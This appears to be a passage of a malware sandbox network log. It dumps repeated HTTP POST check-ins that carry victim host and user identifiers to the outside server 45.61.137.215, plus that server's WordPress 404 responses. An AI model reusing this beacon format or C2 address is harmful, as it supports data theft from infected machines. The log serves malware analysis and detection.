                                            May 29, 2024 15:45:39.773047924 CEST224INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !impo
                                            May 29, 2024 15:45:39.773149014 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                                            Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                                            May 29, 2024 15:45:39.773178101 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                            Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                                            May 29, 2024 15:45:39.773915052 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:39.773946047 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:45:39.773978949 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            81192.168.2.94979645.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:39.931883097 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:39.936844110 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:42.445656061 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:40 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:42.445684910 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:42.445693970 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:42.445700884 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:42.445708990 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:42.445718050 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:45:42.445722103 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:45:42.445738077 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                                            Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:45:42.445755005 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:45:42.445764065 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            82192.168.2.94979745.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:42.784784079 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:42.790692091 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:45.271228075 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:43 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:45.271294117 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:45.271316051 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:45.271332026 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:45:45.271368980 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:45:45.271384954 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:45:45.271403074 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:45.271420002 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:45:45.271435976 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:45:45.271454096 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            83192.168.2.94979845.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:45.418560982 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:45.424213886 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:47.941653967 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:45 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:47.941711903 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:47.941747904 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
